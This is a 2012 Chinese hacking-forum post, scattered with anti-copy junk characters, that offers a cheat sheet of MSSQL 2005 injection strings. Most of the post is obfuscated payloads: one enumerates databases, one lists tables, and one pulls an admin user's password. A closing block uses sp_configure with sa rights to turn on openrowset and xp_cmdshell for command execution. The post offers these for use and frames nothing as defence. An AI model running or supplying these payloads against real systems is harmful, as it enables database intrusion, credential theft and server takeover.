找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2009|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

- b+ M1 d9 D1 i2 i% J' J' o
* x( m' E# v& z) u( ~
6 Y, t7 M2 x: |: F6 z- T[Copy to clipboard]CODE:! D* l- N2 ]- A  q  a% R+ a- X
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
$ U, y6 @. D' F# F# M+ x- X2 T' r
爆表语句,somedb部份是所要列的数据库,红色数字1累加
& Q/ _+ Z, Z( h' c6 a. Z& O  A
4 v) k% T8 c5 `7 y- v+ c$ _4 a* c- v- _: s
[Copy to clipboard]CODE:
3 t- A8 T5 y* A0 _/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
; ?: V8 `: }1 ]- s; l4 V- \/ I1 y) _; Y. x: u
爆字段语句,爆表admin里user='icerover'的密码段
7 ^; H8 w) r- b; F5 K0 R7 S. @1 w; j% n# o5 Y5 C& n3 M$ y
0 m2 A( s* u. ]$ H
[Copy to clipboard]CODE:
+ B! K7 q5 ?4 N0 {**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--$ ]" c% N8 o- a# p1 G* L

8 R. L4 U3 ~$ B( vmssql2005默认没有开xp_cmdshell的,openrowset也不能用
9 {! |2 {" w5 e$ Y# y2 r3 |, K如果是sa权限,可以这样来开启4 z* T+ E! g: R
开启openrowset5 P+ M- t: K/ d# R! F
$ A% t2 t6 e* R5 g* I; ^5 m1 f) J; `
5 ]/ Y6 e3 ^% k9 j
[Copy to clipboard]CODE:, t: k  r% w9 ]; _
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--+ X3 x) b7 S4 V
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
1 `0 ~1 m6 v0 C% s& t/ w( n9 n/ i
+ F. K8 h! }' L, a, V' e/ t' w, _开启xp_cmdshell- q" n7 e3 t" `9 Y6 g$ m/ M

# D8 S) I$ @7 I7 }) b) K0 v
( j. |# B  j9 ^( R7 o. x[Copy to clipboard]CODE:; B4 H0 _: y* p* J+ R# x
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--( _: n$ o. j- e% X. X
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
3 k0 u/ z- l$ s0 B% ]% o# z4 h& j/ Z9 v( C8 Z
ok,over~~晚安
. U* o1 T* o! P' g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表